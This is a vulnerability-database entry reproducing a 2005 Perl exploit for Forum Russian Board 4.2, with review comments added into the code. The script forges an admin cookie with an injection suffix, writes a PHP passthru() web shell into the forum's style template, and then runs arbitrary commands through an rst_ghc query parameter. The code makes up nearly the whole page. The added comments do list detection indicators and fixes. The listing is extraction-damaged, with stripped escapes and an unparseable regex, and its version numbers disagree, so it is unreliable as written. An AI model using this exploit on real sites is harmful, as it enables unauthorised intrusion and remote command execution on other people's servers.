Forum Russian Board 4.2 – Full Command Execution
漏洞ID | 1055175 | 漏洞类型 | |
发布时间 | 2005-06-21 | 更新时间 | 2005-06-21 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞详情
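漏洞细节尚未披露。从下方 EXP 代码本身可以看出:脚本在 Cookie `board_user_cook` 的用户名后附加 `' /*`,携带该 Cookie 访问 `admin/style_edit.php`,并向论坛样式内容写入一段 PHP 代码(推测为后台身份校验处的注入,此处无厂商确认)。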
|漏洞EXP
#!/usr/bin/perl
# Forum Russian Board 4.2 Full (FRB) (http://www.carline.ru , http://frb.ru)
# command execution exploit by RST/GHC (http://rst.void.ru , http://ghc.ru)
# bugs found by foster & 1dt.w0lf , xpl coded by 1dt.w0lf
# RST/GHC - http://rst.void.ru , http://ghc.ru
use IO::Socket;
use Getopt::Std;
# NOTE(review): this listing is extraction-damaged. Escape sequences appear to
# have been stripped (newlines show up as a bare "n") and the regex below has
# unescaped slashes, so the file does not parse as shown. The comments describe
# the evident intent only.
#
# Parse the switches -h -p -u -i -c (each takes a value) into the package
# globals $opt_h, $opt_p, $opt_u, $opt_i and $opt_c.
getopts("h:p:u:i:c:");
$host = $opt_h;
$path = $opt_p;
$user = $opt_u;
$id = $opt_i;
# -c falls back to 'create' when it is absent or evaluates false.
$cmd = $opt_c || 'create';
# Separator placed around the command in the query string; %26%26 is the
# URL-encoded form of "&&".
$cmdspl = "%26%26"; # ; - for unix
# %26%26 - for windows
# Host and forum path are always required.
if(!$host || !$path) { usage(); }
# The create/delete modes additionally need the admin user name and id,
# because both values are sent in the cookies below.
if(($cmd eq 'create' || $cmd eq 'delete') && (!$user || !$id)) { usage(); }
# Intended to drop an "http://" prefix from the host argument.
$host =~ s/(http://)//g;
# Cookie value: the user name followed by a single quote and a "/*" comment
# opener. NOTE(review): presumably this closes a quoted string in a server-side
# query and comments out the remainder (SQL injection in the cookie check);
# the forum source is not shown here, so treat that as an inference. A
# board_user_cook value containing "'" or "/*" is a usable log/WAF indicator.
$cook = $user."' /*";
# Two modes, selected by -c:
#   create/delete : fetch the forum style through the admin style editor, add
#                   or remove a PHP snippet, and post the result back.
#   anything else : the value is treated as a command string and sent to that
#                   snippet through index.php.
# Defender view, all taken from the requests built below: look for hits on
# admin/style_edit.php whose board_user_cook cookie ends in "' /*", for the
# marker string "rst_ghc" inside the stored style content, and for index.php
# requests carrying an rst_ghc query parameter.
# NOTE(review): the technique only works if the admin check accepts the crafted
# cookie and if style content is evaluated as PHP; both are inferred from this
# script. The fixes are server-side: bind cookie values as query parameters,
# and never execute editable template content as code.
if($cmd eq 'create' || $cmd eq 'delete'){
head();
print ">>> CREATE SHELLn" if ($cmd eq 'create');
print ">>> DELETE SHELLn" if ($cmd eq 'delete');
# Plain HTTP to port 80; the request is written by hand, line by line.
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECT FAILEDn";
print $sock "GET ${path}admin/style_edit.php HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Accept: */*n";
# The crafted user cookie and the admin id are sent together.
print $sock "Cookie: board_user_cook=$cook;board_user_id=$idn";
print $sock "Connection: closenn";
print "GETTING CURRENT STYLE ... [";
# Collect the text between the <textarea ...> opening tag and </textarea>;
# $p is the "currently inside the textarea" flag.
while ($res = <$sock>)
{
# Closing tag on this line: keep what precedes it and stop collecting.
if($res =~ /(.*)</textarea>/) { $data .= $1; $p = 0; }
$data .= $res if $p;
# Opening tag on this line: keep what follows the tag and start collecting.
if($res =~ s/(.*)(<textarea)([^<>]*)([>])(.*)/$5/) { $data .= $res; $p = 1; }
}
# No textarea content means the editor page was not returned; give up.
if(length($data)>0) { print " DONE ]n"; }
else { print " FAILED ]n"; exit(); }
# "rst_ghc" doubles as the marker for an already planted snippet.
if($data =~ /rst_ghc/)
{
if($cmd eq 'create') { print "SHELL ALREADY EXIST!"; exit(); }
if($cmd eq 'delete')
{
print "SHELL EXIST.nDELETING SHELL.n";
# Remove the snippet (and leading whitespace) from the style text.
$data =~ s/s*<? if($_GET[rst_ghc]){ passthru($_GET[rst_ghc]); } ?>//g;
}
}
else
{
if($cmd eq 'create')
{
# Append the PHP snippet, which hands the rst_ghc GET parameter to passthru().
$data .= "n";
$data .= '<? if($_GET[rst_ghc]){ passthru($_GET[rst_ghc]); } ?>';
}
if($cmd eq 'delete') { print "SHELL NOT EXIST. CAN'T DELETE."; exit(); }
}
# Percent-encode every character matched by "." as upper-case hex; "." without
# /s does not match a newline, so newlines pass through unencoded.
$data =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
# Form body for the style editor. NOTE(review): the style_edit_ok value looks
# like a percent-encoded single-byte Cyrillic button label; confirm against the
# forum's form.
$post = "message=${data}&form_h=yes&style_edit_ok=%C8%E7%EC%E5%ED%E8%F2%FC";
print "CREATE NEW STYLE ...[";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECT FAILEDrn";
# Same endpoint and cookies as the GET above, now with the modified style.
print $sock "POST ${path}admin/style_edit.php HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Cookie: board_user_cook=$cook;board_user_id=$idn";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "Content-length: ".length($post)."nn";
print $sock "$post";
print $sock "nn";
# The response is never read, so the messages below only mean the request was
# written to the socket.
print " DONE ]n";
if($cmd eq 'create') { print "SHELL CREATED SUCCESSFULLY! NOW YOU CAN TRY EXECUTE COMMAND."; }
if($cmd eq 'delete') { print "SHELL DELETED!"; }
}
else
{
head();
print ">>> COMMAND EXECUTEn";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECT FAILEDn";
# The command is wrapped between two echo markers so its output can be cut out
# of the page; $cmd is interpolated as given, with no URL encoding applied here.
print $sock "GET ${path}index.php?rst_ghc=echo%20_START_%20$cmdspl%20$cmd%20$cmdspl%20echo%20_END_%20; HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Accept: */*n";
print $sock "Connection: closenn";
# Keep only the response lines between the one starting with _START_ and the
# one starting with _END_ (both marker lines excluded).
while ($res = <$sock>)
{
if($res =~ /^_END_/) { $p = 0; }
$data .= $res if $p;
if($res =~ /^_START_/) { $p = 1; }
}
if(length($data)>0) {
print "-----------------------------------------------------------------n";
print $data;
print "-----------------------------------------------------------------n";
exit(0);
}
# Nothing between the markers: report failure; exit status is 0 either way.
else { print "[-] FAILEDnMaybe you forget create shell first?n"; exit(0); }
}
# Show the banner and the option summary, then end the program with status 0.
# Called whenever a required switch is missing.
sub usage()
{
    head();
    # One entry per output line, in display order.
    my @help_lines = (
        " USAGE : r57frb.pl [options]nn",
        " Options: n",
        " -h - host e.g. '127.0.0.1' , 'www.frb.ru'n",
        " -p - path to forum e.g. '/frb/' , '/forum/'n",
        " -u - admin username e.g. 'admin'n",
        " -i - admin id e.g. '1'n",
        " -c [create|delete|cmd]n",
        " create - for create shelln",
        " delete - for delete shelln",
        " cmd - any command for executen",
        "-----------------------------------------------------------------n",
    );
    print join('', @help_lines);
    exit(0);
}
# Print the three-line banner: a rule, the tool title, and the rule again.
# The title string names version 4.0, while the page heading names 4.2.
sub head()
{
    my $rule = "-----------------------------------------------------------------n";
    my $title = "Forum Russian Board 4.0 Full command execution exploit by RST/GHCn";
    print $rule . $title . $rule;
}
# milw0rm.com [2005-06-21]